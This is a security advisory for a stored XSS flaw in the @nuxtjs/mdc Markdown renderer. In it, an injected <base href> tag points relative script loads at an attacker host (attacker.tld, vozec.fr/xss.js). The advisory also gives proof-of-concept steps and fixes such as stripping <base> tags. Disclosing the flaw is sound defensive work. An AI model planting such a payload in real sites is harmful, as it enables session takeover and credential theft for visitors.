GHSA-cj6r-rrr9-fg82

Описание

Summary

A remote script-inclusion / stored XSS vulnerability in @nuxtjs/mdc lets a Markdown author inject a <base href="https://attacker.tld"> element.
The <base> tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context.

Details

• Affected file : src/runtime/parser/utils/props.ts
• Core logic  : validateProp() inspects
  • attributes that start with on → blocked
  • href or src → filtered by isAnchorLinkAllowed()
    Every other attribute and every tag (including <base>) is allowed unchanged, so the malicious href on <base> is never validated.

As soon as <base href="https://vozec.fr"> is parsed, any later relative path—/script.js, ../img.png, etc.—is fetched from the attacker’s domain.

Proof of Concept

Place the following in any Markdown handled by Nuxt MDC:

1. Start the Nuxt app (npm run dev).
2. Visit the page.
3. The browser requests https://vozec.fr/xss.js, and whatever JavaScript it returns runs under the vulnerable site’s origin (unless CSP blocks it).

Impact

• Type: Stored XSS via remote script inclusion
• Affected apps: Any Nuxt project using @nuxtjs/mdc to render user-controlled Markdown (blogs, CMSs, docs, comments…).
• Consequences: Full takeover of visitor sessions, credential theft, defacement, phishing, CSRF, or any action executable via injected scripts.

Recommendations

1. Disallow or sanitize <base> tags in the renderer. The safest fix is to strip them entirely.
2. Alternatively, restrict href on <base> to same-origin URLs and refuse protocols like http:, https:, data:, etc. that do not match the current site origin.
3. Publish a patched release and document the security fix.
4. Until patched, disable raw HTML in Markdown or use an external sanitizer (e.g., DOMPurify) with FORBID_TAGS: ['base'].